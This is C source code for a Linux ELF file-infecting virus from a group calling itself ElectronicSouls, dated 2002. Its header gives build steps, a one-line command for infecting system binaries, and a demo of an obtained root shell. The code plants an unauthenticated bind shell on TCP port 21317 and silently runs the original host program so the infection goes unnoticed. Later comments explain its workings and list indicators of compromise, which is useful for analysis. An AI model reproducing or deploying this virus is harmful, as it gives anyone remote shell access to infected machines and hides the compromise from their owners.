/* ----------------------------------------------------------- [CONFIDENTIAL SOURCE MATERIAL OF THE ELECTRONIC-SOULS CREW] ------------------- DO NOT DISTRIBUTE ! ------------------- ----------------------------------------------------------- [ E l e c t r o n i c S o u l s ] [Invader] - append ELF infect0r - update of the underworld ELF Parasite (C) BrainStorm - 01-2002 ----------------------------------------------------------- Information : +++++++++++++ This ELF Infector uses the appendage infection tekneeq! that means that two executables are appended together: the parasite first, the original host after it. The payload inside this parasite opens a port shell on the infected machine as the user who executed it. Note that this shell listens on every interface and performs no authentication: anyone who can reach the port gets /bin/sh with that user's privileges. The listener is a forked child that waits for exactly one connection. ----------------------------------------------------------- to get it working : +++++++++++++++++++ compile the code, then get the file size and change the define in the code, now recompile and we are done ;) example : i wrote a quick program that just prints a msg and shows the date so i can test the infection: [root@BrainMachine x]# ./blah im a test prog that gets infected :> Sam Jan 5 14:22:43 CET 2002 [root@BrainMachine x]# that is how it looks both before and after the infection, since the parasite extracts the host to a temp file and executes it, so you wont notice the infection unless you added some printf()s from another term: [root@BrainMachine client]# telnet localhost 21317 Trying 127.0.0.1... Connected to brainmachine.electronicsouls.org. Escape character is '^]'. 
uname -a; Linux BrainMachine.ElectronicSouls.org 2.2.17-14 #1 Wed Feb 14 13:51:00 CET 2001 i686 unknown : command not found id; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) : command not found ..now ph34r this ;) ----------------------------------------------------------- to infect a binary : ++++++++++++++++++++ cat /bin/binary >> para: mv para /bin/binary if binary gets executed it opens up a portshell ;) ----------------------------------------------------------- special thanks to : +++++++++++++++++++ ghQst and SectorX for making me interested in ELF infection and for beeing there for me since back in the days =) ! and PhaNtoM for providing me with that very small portshell code ! shouts go out to all ElectronicSouls members - j00 r0ck =) ----------------------------------------------------------- [ElectronicSouls] - Immortal Blackhat since 1995 ;) ----------------------------------------------------------- */ /* the fearsome t e k n e e q z start here ! */ #include #include #include #include #include #include #include #define PARASIZE 18018 /* dont forget to change me ! */ #define TEMP ".para.tmp" /* tmp file */ #define KILL(X) exit(1) /* we dont want to die.. 
*/

/*
 * File-scope state used by the bind-shell child.  As static-storage
 * objects they start out zeroed; that is what leaves serv_addr.sin_zero
 * (never assigned below) as zeros.
 */
int soc,cli;
struct sockaddr_in serv_addr;

/*
 * Entry point of the parasite.  An infected file is laid out as
 * [parasite image, PARASIZE bytes][original host image]; this program is
 * the parasite half.  It does two things:
 *
 *   1. fork()s a child that binds a TCP socket and hands the first
 *      connection an unauthenticated /bin/sh (the "portshell");
 *   2. in the parent, copies the host image that follows it inside its own
 *      executable into TEMP and execve()s it with the original argv/envp,
 *      so the user sees the host run as usual.
 *
 * argc/argv/envp: passed through unchanged to the host via execve().
 * Returns: never returns normally.  exit(1) on any extraction error (KILL),
 * exit(-1) if the final execve() fails, otherwise the process image is
 * replaced by the host.
 *
 * Indicators that follow directly from this code: a listening TCP socket
 * on the port computed below, owned by a process whose exe is an ordinary
 * user binary; a "/bin/sh" child with fds 0-2 attached to a socket; a file
 * named ".para.tmp" left in the cwd (it is never unlinked); and the host
 * running with /proc/<pid>/exe pointing at ".para.tmp" instead of the
 * invoked path.
 */
int main(int argc, char *argv[], char *envp[])
{
    int input, output, lenght;  /* "lenght" [sic]: host size in bytes (int, not off_t) */
    char *dope;                 /* heap copy of the host image */
    struct stat stat;           /* shadows stat(2); only fstat() is used, so it still compiles */

    if(fork()==0) /* start of the portshell */
    {
        /*
         * Magic numbers instead of the <sys/socket.h>/<netinet/in.h> names
         * (presumably to keep the binary small, since its exact size is
         * baked into PARASIZE):
         *   sin_family=2   -> AF_INET
         *   s_addr=0       -> INADDR_ANY: listens on every interface
         *   socket(2,1,6)  -> AF_INET, SOCK_STREAM, IPPROTO_TCP
         *   0x10           -> sizeof(struct sockaddr_in)
         * sin_port is stored without htons(): on a little-endian host the
         * bytes 0x53 0x45 go on the wire, i.e. TCP port 0x5345 = 21317,
         * which is the port the header's telnet example connects to.
         */
        serv_addr.sin_family=2;
        serv_addr.sin_addr.s_addr=0;
        serv_addr.sin_port=(0x4553);
        soc=socket(2,1,6);
        bind(soc,(struct sockaddr *)&serv_addr,0x10);
        listen(soc,1);
        /*
         * Nothing above is checked.  If socket()/bind()/accept() fail (port
         * already taken, for instance) cli is -1, the dup2() calls fail with
         * EBADF, and /bin/sh is exec'd on whatever stdio the child inherited,
         * typically the user's terminal.
         */
        cli=accept(soc,0,0);    /* blocks for exactly one client; backlog 1, no loop */
        dup2(cli,0);
        dup2(cli,1);
        dup2(cli,2);
        /*
         * No authentication and no setsid(): the shell runs as the invoking
         * user inside the parent's session.  If execl() fails the child does
         * NOT exit; it falls through and performs the host extraction below a
         * second time.
         */
        execl("/bin/sh","sh",0);
    }

    /*
     * Parent: locate the host appended after this image.  /proc/self/exe is
     * Linux-specific and follows the running binary even if it was renamed.
     */
    input = open("/proc/self/exe", O_RDONLY);
    if (input < 0) KILL("open(input)");     /* KILL() discards its message: silent exit(1) */
    if (fstat(input, &stat) < 0) KILL("fstat");
    /*
     * PARASIZE must equal the compiled size of this very binary, so any code
     * change here invalidates the offset until the define is updated.  When
     * run uninfected (file smaller than PARASIZE) lenght goes negative, the
     * int converts to a huge size_t, malloc() fails and we exit(1) without
     * exec'ing anything.
     */
    lenght = stat.st_size - PARASIZE;
    dope = malloc(lenght);
    if (dope == NULL) KILL("malloc");
    if (lseek(input, PARASIZE, SEEK_SET) != PARASIZE) KILL("lseek(input)");
    if (read(input, dope, lenght) != lenght) KILL("read(input)");  /* a short read is fatal, not retried */
    close(input);
    /*
     * TEMP is a fixed relative name in the cwd, opened without O_EXCL, with
     * the parasite's own mode bits (subject to umask).  An unwritable cwd
     * means KILL and the host never runs -- that is how an infection gets
     * noticed; a writable one leaves .para.tmp behind, since it is never
     * unlinked.
     * NOTE(review): whether setuid/setgid bits present in st_mode survive
     * this open()+write() depends on the kernel -- confirm before relying on it.
     */
    output = open(TEMP, O_RDWR | O_CREAT | O_TRUNC, stat.st_mode);
    if (output < 0) KILL("open(output)");
    if (write(output, dope, lenght) != lenght) KILL("write(output)");
    free(dope);
    close(output);
    /*
     * Replace ourselves with the host, keeping argv (so argv[0] still shows
     * the original name) and the environment.  execve() only returns on
     * failure, so reaching exit(-1) means "could not run the host"
     * (wait status 255).
     */
    exit(execve(TEMP, argv, envp));
}